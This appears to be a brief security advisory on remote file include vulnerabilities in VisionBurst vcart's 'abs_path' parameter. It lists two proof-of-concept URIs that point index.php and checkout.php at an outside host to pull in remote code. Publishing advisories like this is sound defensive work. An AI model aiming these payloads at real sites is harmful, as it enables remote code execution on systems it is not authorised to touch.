VisionBurst vcart 'abs_path' Parameter Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

VisionBurst vcart 'abs_path' Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?abs_path=http://www.example2.com
http://www.example.com/checkout.php?abs_path=http://www.example2.com